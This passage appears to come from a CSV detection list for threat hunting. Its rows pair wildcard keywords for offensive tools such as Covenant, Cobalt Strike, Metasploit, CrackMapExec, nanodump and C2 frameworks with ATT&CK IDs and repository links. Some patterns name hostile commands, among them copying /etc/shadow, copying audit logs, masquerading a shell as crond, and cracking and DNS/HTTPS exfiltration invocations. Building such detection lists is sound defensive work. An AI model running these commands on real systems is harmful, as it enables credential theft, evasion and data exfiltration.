T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant/wwwroot*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantAPI.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantAPIExtensions.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantBaseMenuItem.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantService.cs*","offensive_tool_keyword","covenant","Covenant is 
a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUser.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserLogin.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserLoginResult.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserRegister.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - 
T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*covid19_koadic.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*cow-branded-longhorn.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cowpatty -f *.txt -r *.cap -s *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Cowpatty*","offensive_tool_keyword","Cowpatty","coWPAtty - Brute-force dictionary attack against WPA-PSK.","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/joswr1ght/cowpatty","1","1","N/A","N/A","2","152","34","2018-12-04T22:26:47Z","2017-08-14T20:33:22Z" +"*cowsay -f dragon 'PEzor!!*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"*cp /etc/passwd*","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cp /etc/shadow /tmp/.*","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cp /etc/shadow*","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cp /var/log/audit/audit.log .tmp*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z"
+"*cp -i /bin/sh */crond*","greyware_tool_keyword","crond","Masquerading as Linux Crond Process.Masquerading occurs when the name or location of an executable* legitimate or malicious. is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.","T1036 - T1564.003 - T1059.004","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z"
+"*cp sliver-* /opt/tools/bin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*cpp_test_payload.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*Cr3dOv3r*","offensive_tool_keyword","Cr3dOv3r","Know the dangers of credential reuse attacks.","T1110 - T1555 - T1003","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/D4Vinci/Cr3dOv3r","1","1","N/A","N/A","10","1902","437","2019-03-28T14:53:38Z","2017-11-13T20:49:57Z" 
+"*cracf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*crack_databases.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*crack_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*Crack-allDBs.git*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z"
+"*Crack-allDBs-main*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z"
+"*crack-allDBs-v1.py*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z"
+"*crack-allDBs-v2.py*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z"
+"*crackhound.py --verbose --password * --plain-text * --domain * --file * --add-password *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*cracklord-master.*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
+"*cracklord-queued*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
+"*cracklord-resourced*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
+"*crackmapexec*","offensive_tool_keyword","crackmapexec","crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*CrackMapExec*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*crackmapexec.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*crackmapexec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*crackmapexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*crackmapexec.spec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*crackpkcs12*","offensive_tool_keyword","crackpkcs12","A multithreaded program to crack PKCS#12 files (p12 and pfx extensions) by Aestu","T1110 - T1185 - T1114","TA0002 - TA0003 - TA0007","N/A","N/A","Credential 
Access","https://github.com/crackpkcs12/crackpkcs12","1","1","N/A","N/A","2","118","26","2019-04-26T18:38:11Z","2015-03-19T22:26:17Z"
+"*crackTGS*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","0","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z"
+"*Crassus.csproj*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z"
+"*Crassus.exe*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z"
+"*Crassus.sln*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z"
+"*crate::modules::{rec2mastodon,rec2virustotal}*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*CravateRouge/autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by 
BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z"
+"*CravateRouge/bloodyAD*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z"
+"*crawlLdrDllList*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z"
+"*crde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from 
DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*crde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*crde::utils::checker*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*crde_x64.exe dns -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*crde_x64.exe https -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*CREATE DATABASE C2;*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z"
+"*create_dummy_dll_file*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*create_protected_process_as_user*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*create-aws-instance.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*CreateC2Dialog.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*CreateC2Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*createdaisypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used 
